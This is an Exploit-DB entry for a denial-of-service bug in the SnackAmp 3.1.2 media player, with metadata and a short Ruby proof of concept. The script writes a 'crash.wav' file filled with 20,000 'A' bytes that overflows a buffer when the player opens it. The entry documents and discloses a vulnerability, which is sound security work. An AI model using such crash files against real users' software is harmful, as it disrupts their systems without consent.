SnackAmp 3.1.2 - '.wav' Buffer Overflow (PoC)
Author: James Fitts
type: dos
platform: windows
port:
date_added: 2010-08-29
date_updated: 2015-07-12
verified: 1
codes: OSVDB-67701
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt15000/14832.png
application_url: http://www.exploit-db.comsnackAmp-Install-3.1.2.exe
# Exploit Title: SnackAmp 3.1.2 Malicious WAV Buffer Overflow Vulnerability (POC)
# Date: 08/28/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/snackamp/
# Version: 3.1.2
# Tested on: Windows XP SP3 EN
# CVE: N/A
#! /usr/bin/env ruby
junk = "\x41" * 20000
File.open("crash.wav", 'w') do |b|
b.write junk
end